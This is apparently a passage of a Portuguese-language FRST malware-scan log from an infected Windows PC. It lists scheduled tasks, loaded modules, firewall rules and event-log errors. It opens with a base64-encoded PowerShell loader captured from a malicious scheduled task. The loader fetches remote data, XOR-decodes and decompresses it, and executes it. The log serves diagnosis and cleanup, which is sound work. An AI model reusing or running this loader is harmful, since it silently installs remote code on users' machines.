B2AE8AbQBnAHQAUQBBADgAZQBZADQAWABnAFoAdgBiAEYATwBPADgANAAxAGUAUAB5AGoAZwBmAEYAMQA5AHEASwBuAG4ANwBRAEwAdwB0ADQAVABnADkAdwBUADQAbQBNAFgAUwBlAEsAVwBHADYAQQBkAGEAOQA1AEwAcgBpAG8AZQAwAGEAUQBqAFMAYgB5AHAANABLAEkAcwBlADkAYgBaADMAbABBADgAOQBvADAAagBtAEEATAAxAE4ANAA3AHIAcABYAEoAVABhAFoAVwBfAGgAagBOAHIAbgBuAHIASAA1AGsAZgBlAFEARwB3AFAARAB4AHkARABPAHUAbwBkAFQARgBIAEQASAB6AEYAdQByAGwANAAxAEYATQBRAGwAOQBGADYATgBTAEcASAB1ADYAMAAyAHgAawBRAHYAcgBGAGcAbgBRADkAZABCAG0AbABnAFIAUwBLAEUATQBJAFAATwBLAG8AXwBkAEsASgBTAG0AcQBRAGYAdgBXAGUAOAAwAG4AOQBEAEEAZQBJAEEAbwBnAFEAUQBNAFMAXwBBAGgAMQBWAGMATAAyAE4AQQBiAGYAcABKAFQAZAB0AHgAbgAzAHgAMQBBAEMARQBRAHUATQBOAGgAbABIAHoAQgBYADAAcwBxAE0AUABNADEAXwBLAE8ANgAzAEwAMgBzADcAVwA5AHAAQgB4ADYASgBZAG4AdQA0ADMAQgB0AHYAUAB0ADIAaQBqAEQAMwBWADAAcQBMAHgAZwAzADgAQQA5AGEASgA0AEcAZgBPAHQAOQBYAGMARABDAGMAYgBhAHUAUABEAEgANAB0AHcAZgAyAGcAagBoAFAAQwA4AHEAVgBpAHAAMQBYAGwAWgBiAG0AaQBxAFUAMgB5AHAAcwBrAG0AaQA1AEMAYwBVAEcAZwBzAFgAOQA4AFgATwBNAFoAOQA3AGMAUgBuAEUAZgA0AGUAagBWAEUAWQBUAE4AMgB4AGoAVAAzAFYANABSADYANwAwADEATAAyAEoAaABFAEMAZQBVAGMARgB0ADgAUABFAE0AdwBDAGMAWgAyAEUAbwBGAHIASQB1AFQAcwBVAC0ARAAzAHMAdQBKAEYAUwA3AHoANwA3AEgAdgBrAG0ARQA3AEEAVQBGADMARwBPADkAOABTAFEAYgBnAGcAMwBQAEsATwBLAEsAMwBNAEIATwBJAGcAaAAwADYAbgBKAEwAYwAtAFQAcgBTAG4AVgBiAF8AeAB3AGoAZAB4AGgANQA5AG8AUABaAEUAZwBpAGEAZQB6AEEAcwBDAGwAVgB1AFAAYQBMAF8ATABpADgAQwBfAHIANQAyAFMAagBfAFgARAA0ADkAUwAxAFMAMwBwAGMAZABOAFIAbgBTAFkAOQBRAG8ANgBsAEwAQQAtAHUAUABQAEsAdgBDAGkAdgBGAEgAXwBwAEUAOQA5AFYAcAB5AE4AQgBoAFQAegBNAFYASAByAEUANwA0ADYAYwBZAGgAVQB5AGcAaAByAGcAbgBOAHUAbQBSAEcAOQBiAHYAeQBxAEoAMwBJAGsAQwBMAHcAZQBDAFAAZQBFAGkAYwBlAFoARwBNAGMAbgBMAGEARwAwAEgAOABqAF8AegB2AEMAVwBtAHQAOQBDAFAAegB2AEQARQA2ADYASwBDAGEASwBjAHEAcwA5AFUASwBhAEcASgBJAGQAYQBmAFQAdwBDAGYAXwBzAHAAcABzAHUAUwAxAHIAQQA4AEkAbABwAHQAMwBDADAAOABPAGoAMAB6AG4AcgB1AEgAaQAtAFkAWABVAGYAOQBLAE4AdABTAEgAVABWAEgATQBHAE4AbwBLAFkAWABhADkAWABJAFAAMABTADEASwAwAHAAdQBRAG8ATQBZAHcAdAAwADkAXwBFADIAdABQAF8AZgBvAG8AdABCAFYANwByADYATwBnAEsAVgBKAEMAYgBuAGYANwBsAFUAcABuAGIAOABtAEQAXwBhAFQATgB6ADYAOQBwAFgATABSAHoAJgBjAD0AcQB3AFYARABIADUASQA1AHEASQBaAG8ASwBwAHUAVgBDAGEAeQBTAGcAUAAtAFcATABIAEoAMgBCADUAVABsADcAZgB0AEwAVQBzAFUAOQBiAHAAcgBKAE4AZABFAEEAeQB1AG8ASQB3AG0AeABFAFEATQBwAGcAVgBOAE0AQwBMAGIAZgBsADgAOQBsAEwAbAAwAGsANQBKADEAeABXAFIAMwB6AFcAcAA2AHEASwBKAGMANABBAC0ASgBYAGQAWgBxAF8ASABSAE8AMwBjAGsASgBVAEQAagA1ADgALQBYAGEAegB2AG4ASwBEAEcAVABVADcAbQBCAE8ARABNAHkANgA2ADMAMwBnAHMARgBQAC0AaABQAEwAUAA0AHUASABVADEAagBWAFIAVwBGAHcAcABfAC0ARABDAGwAMgBYAF8AYgBNAE4AUQBSAEgAUgBtAEUAegBwAE0AcABBADMATgAwAHQAegBpAEYAMwBXADgAUQB2ADIAXwBrADMAQwB3AEEANgBFAGMAdQBnADEASgAwAHMATgBhAF8AZABFAGEAVABkAFcAcAA1AGEAZQBTAEIAawBBAFIAZABPAEUAQQBJAFYAbQBiADcAdgBOADAAWABhAHAARwBQAGkAQgByAHcAWABHAHkAYwBjAEQASAA4AGsAawB4AHEARgBsAEsAcABWAFoAdABBADkAaQB2AEcAUAB1AEUAUwB3AHAAbQBWAEIAMABEAHAAbgBNAGoARgBuAHQAYwB3AEIAUQBiADMAcQByAEkANgBSAF8AMQBaAHEARQBWAHQAagBDAFUAMwBxAEgAWQBDAGEAdABrAGEAUABmAGcAegA2AGkASwBYAGgANQBTADEAeQA4AFoANABMAEsAbQB0AEYAdQBfAHkAZgA2AGEAbwBKAGIATwBIAGMALQAtAFgAZgBRADAALQBiAEIAawA2AGUARgBnAGYAUgA4AC0AcABCAFcAcgBOAEYAbwBuAEwAVQA4AC0AQQBYAGcAVwB2AEUAQQBGAEEARAB2AGEASQBfAGYAOABHAG8ANwBOAG0AYQBfAE0AeABTADAANABUADEAVQBoAFYAcABoAHEAQwBYAHIAVABoAFAAdwBuAGcAMQA5AEIAUgBpAE8AVABEAFUATAAtAGMAZwBmAHQAWABiAFEAdQBrAEMANAAyAFQAdABQAGcAbwBCAHgARgBnAEkAcQBKAFcAQgBMAGEANwBRADAANQA2AHcAbABsAFAAMABDAGoAUABfAGUAagBPAEsAUwAzAFgAZgBCAE0AZQBtAGwASABLAF8AcQA4AG8AQwBBAF8AUQBtAHAAVgBsAHUAWgBHAGwANQBoAGwAZgBhADYAdABzAEIAcQBwAFoAZQAzAFEAWABGAE0AZgBDADAAWQBzAHcAaAAzAHkAdQBYAGcAdwB3AGIAWAA1AHkAOABRAEIAaQBKAFMASAB1ADcARgBDAF8ARgBXAFgATwBNAEcAYwBaAGgAXwBWAGIAbQBlAHYAbABtAHAAeQBMAGgAcQBMAHIASwBHADIAawBvAFUARABZAEEAcQBxAGoAbwBrAGsAeQBxAGQAVwBMAEQANQBQAEgAUQB4AEQAWQBZAEEAXwBDADkAWQBLADQAawBGAEYAQQBwAGkAZwAwAHgAOQBlAE0AWQB6AFcARQBSAGkAZgA2AHYAegBQAEgAVwB4AFQAMQBUAFUAeABUAHgAXwBvADUAbwBuAFAAdwBYAEsAegB5AHQAYQB1AHoASgBIADUANwBhAEQAQgB3ADEAMgA0AFEATgBvAG0AdgAwAEMAYgBBAHcAagBtAGkAUgBUAFAARAB2AHkAdABwAFEAbQB2AHYATAAwAE8ARgBZAHgAWgBPADkAVQA3AHMATgBYAEYAZwBRAEYAOQA5AFgAXwAxAG4ASwBUAFQAcgBDAHYAbABnAG4ARwA0AHYAVwBJAGMAVABNAFIATgBQAFAAeAA2AHEASwB6ADIAcgBZAFMATwB0AHIANgB4AFIAVAAxAFQAbAB3AEEAWgB5AHkAbQB0AHYAdwByADUAYgA2AHUAYQB3ADIASwBCAHgAYQBlADIATgBmADMASQBrAGUARwA1AEUAQwB0AHcAegBIAFoAdAB5AHUAWQA1AFgAVABpAGYAcABBAHAAawBrAEcAVwBEADcAcgA4AGEAMQB2AG4AQwBOAEsAMgBGADEAegB0ADUAeABBAGIARwBYADQAagBTADMAXwBDAFoASgByADcAZAAzAGQAWgBKAEEAWgBlAHUAbwBWAFkARwBXADEATgB4AEgATwBiAHIAdQBnADIAeQBpADcAWABhAC0AdgBpAEYAdQBEAEUARQBUAFUATABlAFYANABsAGwAcQBKAEgARgBGAE4AbABFAE8AbwByADIAOABhAFEAUwAxAFgAZwBKAFAAbAAmAHIAPQA1ADIAMAA1ADMAOAAxADQAMQA2ADIANgAwADAAOAA4ADYAMgA4ACIAOwAkAHMAdABzAGsAPQAiAHsAMABBADAARAAwADgANAA3AC0AMABEADAAQwAtADAANAAwAEQALQAwAEQAMQAxAC0ANwBFADAANQAwADUAMAA0ADEAMQA3AEUAfQAiADsAJABwAHIAaQBkAD0AIgBTAHkAcwB0AGUAbQBIAGUAYQBsAGUAcgAiADsAJABpAG4AaQBkAD0AIgBLAEMASgBMAEcARgBPAFEAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {ED7BCE54-A07B-40AE-9F09-D081442317AE} - System32\Tasks\{5650ECF4-34A2-4B5C-96F0-983F75C5EB1B} => pcalua.exe -a "C:\Program Files (x86)\MTV20151125\uninstall.exe" -d "C:\Program Files (x86)\MTV20151125"
Task: {EDC8D0BB-3E01-4D79-9B4A-0414B5867F44} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {F38DAB9F-41B6-451F-99DF-4464F63DABBC} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {F40314A8-999F-4BC8-A2CF-A070F9F550A7} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Nenhum Arquivo <==== ATENÇÃO
Task: {F4AC9811-AEA6-462D-A335-93A76593E03A} - \PFExe -> Nenhum Arquivo <==== ATENÇÃO
(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\{2A6A6C0A-6DF1-4478-807F-2FF9BF46B935}.job => C:\Users\Marcio\AppData\Roaming\{2F3AA0F6-976C-4b02-A66A-5D1DEA00811F}\InstallHelp.exe-RunCheckUpdate C:\Users\Marcio\AppData\Roaming\{2F3AA0F6-976C-4b02-A66A-5D1DEA00811F}\CheckUpdate.exe <==== ATENÇÃO
==================== Atalhos =============================
(As entradas podem ser listadas para serem restauradas ou removidas.)
==================== Módulos Carregados (Whitelisted) ==============
2015-09-10 02:07 - 2015-09-10 02:07 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-10 02:08 - 2015-09-10 02:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-09-23 17:41 - 2015-09-23 17:41 - 00188072 _____ () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
2015-11-08 10:05 - 2015-11-08 10:05 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-11-08 10:05 - 2015-11-08 10:05 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-09-05 00:17 - 2013-09-05 00:17 - 04300456 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2015-10-09 10:22 - 2015-12-08 00:57 - 00169408 _____ () C:\Program Files (x86)\Garena Plus\ggdllhost.exe
2015-11-08 10:06 - 2015-11-08 10:06 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2012-11-26 23:54 - 2012-11-26 23:54 - 00094208 _____ () C:\WINDOWS\System32\IccLibDll_x64.dll
2016-01-14 22:16 - 2016-01-14 06:46 - 02412032 _____ () C:\Users\Marcio\AppData\Roaming\msiql.exe
2016-01-16 19:36 - 2016-01-16 18:42 - 01905664 _____ () C:\ProgramData\WindowsMsg\osmsg.exe
2014-11-13 17:31 - 2014-11-13 17:31 - 00057344 _____ () C:\Program Files\CCleaner\lang\lang-1046.dll
2016-01-09 22:13 - 2016-01-09 22:13 - 00039192 _____ () C:\Program Files\CCleaner\branding.dll
2015-12-12 07:16 - 2015-11-25 01:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-12 07:16 - 2015-11-25 01:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-12 07:16 - 2015-11-25 01:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-11-08 10:05 - 2015-11-08 10:05 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2015-07-10 00:13 - 2015-09-10 02:07 - 00210432 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.ProxyStub.dll
2014-04-07 11:31 - 2014-04-07 11:31 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2015-10-09 10:23 - 2015-12-08 00:57 - 02535872 _____ () C:\Program Files (x86)\Garena Plus\ggspawn.dll
2013-09-05 00:14 - 2013-09-05 00:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-01-14 23:27 - 2016-01-12 13:35 - 01590088 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.111\libglesv2.dll
2016-01-14 23:27 - 2016-01-12 13:35 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.111\libegl.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
AlternateDataStreams: C:\ProgramData\TEMP:DFC5A2B2
AlternateDataStreams: C:\Users\Todos os Usuários\TEMP:DFC5A2B2
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-13 23:34 - 2016-01-16 20:00 - 00000753 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Marcio\Desktop\Marcio\Imagens\2.png
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run32: => "LightGate"
HKLM\...\StartupApproved\Run32: => "MTview"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\StartupApproved\Run: => "GarenaPlus"
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\StartupApproved\Run: => "DAEMON Tools Lite Automount"
HKU\S-1-5-21-3906656628-415594203-1951508915-1001\...\StartupApproved\Run: => "lsas"
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [TCP Query User{FB2C75CB-A22C-4978-A353-6795F7DB3D8A}C:\users\marcio\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{74DDAC89-5B08-491D-AA65-77DE1F1DA603}C:\users\marcio\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [{25A1706F-ADDD-4C53-ABF8-97EE159EF6DF}] => (Block) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [{2611ECB4-6187-43FA-9CB3-C91F48FFE2AA}] => (Block) C:\users\marcio\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{7241B169-8C89-44F0-9B47-EE16E6034EF3}C:\users\marcio\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\marcio\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{E617D7D1-FF28-4D53-81B3-618A00F48BA7}C:\users\marcio\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\marcio\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{A5983147-5176-41E6-8E42-CFD6A5CD3D88}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
FirewallRules: [{EBD491B5-5F62-46FD-AF92-B4B6A1A9FFE7}] => (Allow) C:\Program Files (x86)\mystarttb\ToolbarCleaner.exe
==================== Pontos de Restauração =========================
16-01-2016 18:03:49 Ponto de Verificação Agendado
16-01-2016 21:22:59 Backup do Windows
16-01-2016 21:35:18 Backup do Windows
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (01/16/2016 09:35:44 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:28:45 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:28:00 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:23:21 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (01/16/2016 09:09:40 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ElanTPCfg64.exe, versão: 1.0.65.1, carimbo de data/hora: 0x4f0be108
Nome do módulo com falha: ETDApi.dll, versão: 11.9.0.0, carimbo de data/hora: 0x5448e4ce
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000008f72
ID do processo com falha: 0xe5c
Hora de início do aplicativo com falha: 0xElanTPCfg64.exe0
Caminho do aplicativo com falha: ElanTPCfg64.exe1
Caminho do módulo com falha: ElanTPCfg64.exe2
ID do Relatório: ElanTPCfg64.exe3
Nome completo do pacote com falha: ElanTPCfg64.exe4
ID do aplicativo relativo ao pacote com falha: ElanTPCfg64.exe5
Error: (01/16/2016 09:08:26 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy!App com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (01/16/2016 08:13:07 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome do aplicativo com falha: ElanTPCfg64.exe, versão: 1.0.65.1, carimbo de data/hora: 0x4f0be108
Nome do módulo com falha: ETDApi.dll, versão: 11.9.0.0, carimbo de data/hora: 0x5448e4ce
Código de exceção: 0xc0000005
Deslocamento da falha: 0x0000000000008f72
ID do processo com falha: 0xe64
Hora de início do aplicativo com falha: 0xElanTPCfg64.exe0
Caminho do aplicativo com falha: ElanTPCfg64.exe1
Caminho do módulo com falha: ElanTPCfg64.exe2
ID do Relatório: ElanTPCfg64.exe3
Nome completo do pacote com falha: ElanTPCfg64.exe4
ID do aplicativo relativo ao pacote com falha: ElanTPCfg64.exe5
Error: (01/16/2016 08:11:58 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI com o erro: -2144927141. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (01/16/2016 08:10:27 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (01/16/2016 08:10:27 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Marcio-PC)
Description: Falha na ativação do aplicativo Microsoft.XboxApp_8wekyb3d8bbwe!Microsoft.XboxApp com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Erros de Sistema:
=============
Error: (01/16/2016 09:25:15 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}AUTORIDADE NTSERVIÇO LOCALS-1-5-19LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (01/16/2016 09:09:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Replicate Exit devido ao seguinte erro:
%%3
Error: (01/16/2016 09:09:29 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Free Space Decimal Point devido ao seguinte erro:
%%3
Error: (01/16/2016 09:09:23 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: O serviço Listener Adapter Net.Tcp depende do serviço Serviço de Compartilhamento de Porta Net.Tcp, mas não foi possível iniciá-lo devido ao seguinte erro:
%%1058
Error: (01/16/2016 09:09:22 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço GoogleChromeUpService devido ao seguinte erro:
%%2
Error: (01/16/2016 09:08:26 PM) (Source: DCOM) (EventID: 10010) (User: Marcio-PC)
Description: Windows.Security.Authentication.Web.Core.BackgroundGetTokenTask.ClassId.WebAccountProvider
Error: (01/16/2016 09:08:24 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: O serviço Host de Sincronização_Session1 foi finalizado inesperadamente. Isto aconteceu 1 vez(es). A seguinte ação corretiva será tomada em 10000 milissegundos: Reiniciar o serviço.
Error: (01/16/2016 08:33:28 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: O serviço Gerenciador de Autenticação Xbox Live terminou com o seguinte erro específico de serviço:
%%0
